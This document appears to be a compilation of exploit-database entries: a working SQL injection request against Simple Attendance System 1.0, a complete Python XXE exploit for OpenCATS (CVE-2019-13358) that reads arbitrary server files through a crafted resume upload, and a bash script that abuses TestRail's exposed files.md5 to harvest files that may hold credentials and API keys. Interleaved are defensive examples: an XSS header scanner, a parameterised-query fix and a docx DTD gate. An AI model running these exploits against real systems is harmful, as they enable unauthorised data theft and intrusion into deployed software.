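An added example, not part of the PoC or of Filerun: the hex-entity encoding applied to the script above, the stdlib decoder an analyst uses to read such values back out of stored login records, and a check that flags X-Forwarded-For values that are not IP addresses. The log records and their field names are constructed, not Filerun's real log schema.

```python
import html
import ipaddress
import re


def hex_entity_encode(text):
    """Encode every character as an HTML hex entity; this is how the PoC turns
    its JavaScript into the long &#x..; string placed in X-Forwarded-For."""
    return "".join(f"&#x{ord(ch):02x};" for ch in text)


def decode_entities(value):
    """Single-pass entity decoding with the stdlib. One pass is deliberate: a
    second pass would also rewrite legacy entities without semicolons (the
    "&sect" inside "&section=") and corrupt the evidence."""
    return html.unescape(value)


TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z][\w-]*")
EVENT_HANDLER_RE = re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE)
SCRIPT_HINT_RE = re.compile(r"XMLHttpRequest|fetch\s*\(|document\.|eval\s*\(|javascript:", re.IGNORECASE)


def is_plausible_xff(value):
    """X-Forwarded-For legitimately holds only a comma-separated list of IP literals."""
    try:
        for part in value.split(","):
            ipaddress.ip_address(part.strip())
    except ValueError:
        return False
    return True


def classify_header_value(value):
    """Reasons a client-supplied header value looks like a stored-XSS payload."""
    reasons = []
    decoded = decode_entities(value)
    if decoded != value:
        reasons.append("entity-encoded")
    if TAG_RE.search(decoded):
        reasons.append("html-tag")
    if EVENT_HANDLER_RE.search(decoded):
        reasons.append("event-handler")
    if SCRIPT_HINT_RE.search(decoded):
        reasons.append("script-api")
    return reasons


# Constructed sample records (not Filerun's real log schema): the "ip" field
# holds whatever the client sent in X-Forwarded-For. The second record carries
# the PoC's <img> wrapper around a shortened stand-in for its script.
SAMPLE_SCRIPT = 'var x = new XMLHttpRequest(); x.open("POST", "/?module=cpanel&section=settings", true);'
SAMPLE_LOGIN_RECORDS = [
    {"user": "alice", "ip": "203.0.113.7", "result": "ok"},
    {"user": "nonexistend", "result": "failed",
     "ip": '<img src="/asdasdasd" onerror=' + hex_entity_encode(SAMPLE_SCRIPT) + ' >'},
]


def scan_login_records(records):
    """Flag records whose IP field is not an IP, attaching the decoded value so
    an analyst can read what the admin panel would have rendered."""
    findings = []
    for rec in records:
        if is_plausible_xff(rec["ip"]):
            continue
        findings.append({
            "user": rec["user"],
            "reasons": classify_header_value(rec["ip"]),
            "decoded": decode_entities(rec["ip"]),
        })
    return findings


if __name__ == "__main__":
    for finding in scan_login_records(SAMPLE_LOGIN_RECORDS):
        print(finding["user"], finding["reasons"])
        print(finding["decoded"])
```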
            
# Exploit Title: Simple Attendance System 1.0 - Unauthenticated Blind SQLi 
# Exploit Author: ()t/\/\1
# Date: September 21, 2021
# Vendor Homepage: https://www.sourcecodester.com/php/14948/simple-attendance-system-php-and-sqlite-free-source-code.html
# Tested on: Linux
# Version: v1.0

# Exploit Description:
The application suffers from an unauthenticated SQL Injection vulnerability. Input passed through the 'employee_code' POST parameter in 'http://127.0.0.1/attendance/Actions.php?a=save_attendance' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and retrieve sensitive data.


# PoC request 

POST /attendance/Actions.php?a=save_attendance HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/attendance/attendance.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 138
Connection: close
Cookie: PHPSESSID=11c4e96bb334b51540f4758e9d33885d


employee_code=2d'+OR+SUBSTR((select+user_id+from+user_list+where+username="admin"),1,1)="1"--&att_type_id=1&date_created=&att_type=Time+In
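An added example, not the application's code: the string-built query that produces this flaw beside its parameterised replacement, run against a constructed in-memory SQLite database (the application uses SQLite) with the payload above. The payload is rewritten with single-quoted SQL strings because the original's "admin" and "1" rely on SQLite's double-quoted-string fallback, which not every build enables; the table and column names beyond user_list/user_id/username are assumptions.

```python
import re
import sqlite3

# The page's boolean-based payload with single-quoted SQL string literals.
PAYLOAD_TEMPLATE = (
    "2d' OR SUBSTR((select user_id from user_list where username='admin'),1,1)='{guess}'--"
)


def make_db():
    """Constructed stand-in for the app's SQLite database (names assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE user_list (user_id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        CREATE TABLE employees (employee_code TEXT, name TEXT);
        INSERT INTO user_list VALUES (1, 'admin', 'constructed-hash');
        INSERT INTO employees VALUES ('1a', 'Alice'), ('1b', 'Bob');
    """)
    return conn


def save_attendance_vulnerable(conn, employee_code):
    """Mirrors the flaw: the POST parameter is concatenated into the query, so
    the closing quote, the OR clause and the trailing comment all take effect."""
    sql = "SELECT name FROM employees WHERE employee_code = '" + employee_code + "'"
    return [row[0] for row in conn.execute(sql)]


def save_attendance_fixed(conn, employee_code):
    """Hardened form: the value is bound as a parameter, so the quote and the
    OR clause are just characters inside the compared string."""
    sql = "SELECT name FROM employees WHERE employee_code = ?"
    return [row[0] for row in conn.execute(sql, (employee_code,))]


def is_valid_employee_code(employee_code):
    """Defence in depth: codes are short alphanumerics; reject anything else
    before it reaches the database layer."""
    return re.fullmatch(r"[A-Za-z0-9_-]{1,32}", employee_code) is not None


def oracle(lookup, conn, guess):
    """True when the injected condition holds: rows come back even though no
    employee has the code '2d'. With the fixed lookup this is never True."""
    return len(lookup(conn, PAYLOAD_TEMPLATE.format(guess=guess))) > 0


def recover_first_digit(conn):
    """Shows why the page calls this 'blind': one true/false answer per guess is
    enough to learn the first character of admin's user_id."""
    for digit in "0123456789":
        if oracle(save_attendance_vulnerable, conn, digit):
            return digit
    return None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable lookup leaks digit:", recover_first_digit(db))
    print("fixed lookup with payload:", save_attendance_fixed(db, PAYLOAD_TEMPLATE.format(guess="1")))
    print("payload passes validation:", is_valid_employee_code(PAYLOAD_TEMPLATE.format(guess="1")))
```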
            
# Exploit Title: OpenCats 0.9.4-2 - 'docx ' XML External Entity Injection (XXE) 
# Date: 2021-09-20
# Exploit Author: Jake Ruston
# Vendor Homepage: https://opencats.org
# Software Link: https://github.com/opencats/OpenCATS/releases/download/0.9.4-2/opencats-0.9.4-2-full.zip
# Version: < 0.9.4-3
# Tested on: Linux
# CVE: 2019-13358

from argparse import ArgumentParser
from docx import Document
from zipfile import ZipFile
from base64 import b64decode
import requests
import re

xml = """
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE root [<!ENTITY file SYSTEM 'php://filter/convert.base64-encode/resource={}'>]>
<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14">
    <w:body>
        <w:p>
            <w:r>
                <w:t>START&file;END</w:t>
            </w:r>
        </w:p>
        <w:sectPr w:rsidR="00FC693F" w:rsidRPr="0006063C" w:rsidSect="00034616">
            <w:pgSz w:w="12240" w:h="15840"/>
            <w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="720" w:footer="720" w:gutter="0"/>
            <w:cols w:space="720"/>
            <w:docGrid w:linePitch="360"/>
        </w:sectPr>
    </w:body>
</w:document>
"""

class CVE_2019_13358:
    def __init__(self):
        self.args = self.parse_arguments()

    def parse_arguments(self):
        parser = ArgumentParser()

        required = parser.add_argument_group("required arguments")
        required.add_argument("--url", help="the URL where OpenCATS is hosted", required=True)
        required.add_argument("--file", help="the remote file to read", required=True)

        args = parser.parse_args()

        if not args.url.startswith("http"):
            args.url = f"http://{args.url}"

        args.url = f"{args.url}/careers/index.php"

        return args

    def create_resume(self):
        document = Document()
        document.add_paragraph()
        document.save("resume.docx")

    def update_resume(self):
        with ZipFile("resume.docx", "r") as resume:
            resume.extractall()

        with open("word/document.xml", "w") as document:
            document.write(xml.format(self.args.file).strip())

        with ZipFile("resume.docx", "w") as resume:
            resume.write("word/document.xml")

    def get(self):
        params = { "m": "careers", "p": "showAll" }

        try:
            request = requests.get(self.args.url, params=params)
        except Exception as e:
            raise Exception("Failed to GET to the URL provided", e)

        # Capture every digit of the first job order ID on the careers page
        id = re.search(r"ID=([0-9]+)", request.text)

        if id is None:
            raise Exception("No vacancies were found")

        return id.group(1)

    def post(self, id):
        params = { "m": "careers", "p": "onApplyToJobOrder" }
        files = {
            "ID": (None, id),
            "candidateID": (None, "-1"),
            "applyToJobSubAction": (None, "resumeLoad"),
            "file": (None, ""),
            "resumeFile": open("resume.docx", "rb"),
            "resumeContents": (None, ""),
            "firstName": (None, ""),
            "lastName": (None, ""),
            "email": (None, ""),
            "emailconfirm": (None, ""),
            "phoneHome": (None, ""),
            "phoneCell": (None, ""),
            "phone": (None, ""),
            "bestTimeToCall": (None, ""),
            "address": (None, ""),
            "city": (None, ""),
            "state": (None, ""),
            "zip": (None, ""),
            "keySkills": (None, "")
        }

        try:
            request = requests.post(self.args.url, params=params, files=files)
        except Exception as e:
            raise Exception("Failed to POST to the URL provided", e)

        start = request.text.find("START")
        end = request.text.find("END")

        file = request.text[start + 5:end].strip()

        try:
            file = b64decode(file)
            file = file.decode("ascii").strip()
        except:
            raise Exception("File not found")

        print(file)

    def run(self):
        self.create_resume()
        self.update_resume()

        id = self.get()
        self.post(id)

CVE_2019_13358().run()
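An added defensive example, not the exploit's or OpenCATS' code: a pre-parse gate for uploaded .docx resumes that scans every XML part of the package for a DOCTYPE or an external entity declaration (the shape of the document.xml above) before any text is extracted. The package layout and document parts are constructed and minimal; the target path in the hostile sample is a placeholder.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"

# Constructed sample parts. The hostile one mirrors the PoC's document.xml:
# a DOCTYPE declaring an external entity whose expansion lands inside <w:t>.
BENIGN_DOCUMENT_XML = (
    b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    b'<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
    b'<w:body><w:p><w:r><w:t>Jane Doe, Python developer</w:t></w:r></w:p></w:body></w:document>'
)
HOSTILE_DOCUMENT_XML = (
    b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    b"<!DOCTYPE root [<!ENTITY file SYSTEM 'php://filter/convert.base64-encode/resource=PLACEHOLDER_PATH'>]>"
    b'<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
    b'<w:body><w:p><w:r><w:t>START&file;END</w:t></w:r></w:p></w:body></w:document>'
)

DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)
# General or parameter entity that points outside the document
EXTERNAL_ENTITY_RE = re.compile(rb"<!ENTITY\s+%?\s*\S+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)


def build_docx(document_xml):
    """Minimal in-memory .docx holding just the part the PoC tampers with."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/document.xml", document_xml)
    return buf.getvalue()


def find_dtd_in_docx(docx_bytes):
    """Scan every XML part of the package for a DTD. Returns {part: reason};
    an empty dict means the package is clean. The check is textual and runs
    before any XML parser touches the content."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.lower().endswith((".xml", ".rels")):
                continue
            prolog = z.read(name)[:65536]  # a DOCTYPE must precede the root element
            if EXTERNAL_ENTITY_RE.search(prolog):
                findings[name] = "external entity (XXE)"
            elif DOCTYPE_RE.search(prolog):
                findings[name] = "DOCTYPE present"
    return findings


def extract_resume_text(docx_bytes):
    """What a resume parser should do: refuse packages carrying a DTD, then read
    the <w:t> runs with xml.etree, which does not expand external entities."""
    findings = find_dtd_in_docx(docx_bytes)
    if findings:
        raise ValueError(f"rejected upload: {findings}")
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        root = ET.fromstring(z.read("word/document.xml"))
    return "".join(t.text or "" for t in root.iter(f"{{{W_NS}}}t"))


def is_rejected(docx_bytes):
    """Convenience wrapper: True when the gate refuses the package."""
    try:
        extract_resume_text(docx_bytes)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("benign:", extract_resume_text(build_docx(BENIGN_DOCUMENT_XML)))
    print("hostile:", find_dtd_in_docx(build_docx(HOSTILE_DOCUMENT_XML)))
```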
            
# Exploit Title: Gurock Testrail 7.2.0.3014 - 'files.md5' Improper Access Control
# Date: 22/09/2022
# Exploit Author: Sick Codes & JohnJHacking (Sakura Samuraii)
# Vendor Homepage: https://www.gurock.com/testrail/
# Version: 7.2.0.3014 and below
# Tested on: macOS, Linux, Windows
# CVE : CVE-2021-40875
# Reference: https://johnjhacking.com/blog/cve-2021-40875/

CVE-2021-40875: Improper Access Control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths. The corresponding file paths can be tested, and in some cases, result in the disclosure of hardcoded credentials, API keys, or other sensitive data.

# Method 1

#!/bin/bash
# Author:       sickcodes & johnjhacking
# Contact:      https://twitter.com/sickcodes
# https://github.com/SakuraSamuraii/derailed
# Copyright:    sickcodes (C) 2021
# License:      GPLv3+

# stop null byte error while curling
shopt -s nullglob

! [ "${1}" ] && { echo "No target was specified. ./script.sh 'https://target/'" && exit 1 ; }

TARGET="${1}"

wget https://raw.githubusercontent.com/SakuraSamuraii/derailed/main/files.md5.txt

FILE_LIST="${PWD}/files.md5.txt"

mkdir -p ./output
cd ./output

touch ./accessible.log

# option to get a fresh updated files.md5, if it comes in a future version
# curl "${TARGET}/files.md5" > ./files.md5

while read -r HASH SUFFIX; do
    echo "${SUFFIX}"
    TESTING_URL="${TARGET}/${SUFFIX}"
    echo "========= ${TESTING_URL} ========="

    # Ignore list: some of these files MAY be world readable if the
    # organisation has modified the permissions on them; otherwise
    # they are skipped.
    case "${SUFFIX}" in
        *'.php' ) continue
            ;;
        *'.html' ) continue
            ;;
        *'LICENSE' ) continue
            ;;
        *'README.md' ) continue
            ;;
        *'.js' ) continue
            ;;
        *'.svg' ) continue
            ;;
        *'.gif' ) continue
            ;;
        *'.png' ) continue
            ;;
        *'.css' ) continue
            ;;
        *'.exe' ) continue
            ;;
        # *'.add_your_own' ) continue
        #     ;;
    esac

    # peek at page response
    # doesn't work because gurock returns 200 and prints the error in plaintext
    # curl -s -I -X POST "${TESTING_URL}"

    # fetch the page, following redirects, into a variable
    OUTPUT_DATA="$(curl -L -vvvv "${TESTING_URL}")"

    # find disqualifying phrases in the page contents
    # and skip any pages that are "denied access" or "direct script access"
    case "${OUTPUT_DATA}" in
        *'No direct script'* ) continue
            ;;
        *'Directory Listing Denied'* ) continue
            ;;
    esac

    # save all interesting pages, with forward slashes replaced by colons
    # https://www.target/
    # will be saved as:
    # https:::www.target:
    tee "${SUFFIX//\//\:}" <<< "${OUTPUT_DATA}"

    # print to stdout, and also append to ./accessible.log the successful saves
    tee -a ./accessible.log <<< "${TESTING_URL}"

done < "${FILE_LIST}"

### Results
In your results folder you will have a few important files from the host, namely the initial SQL database insert statements with specific unique information pertaining to that server running Gurock TestRail 7.2.0.3014 and below.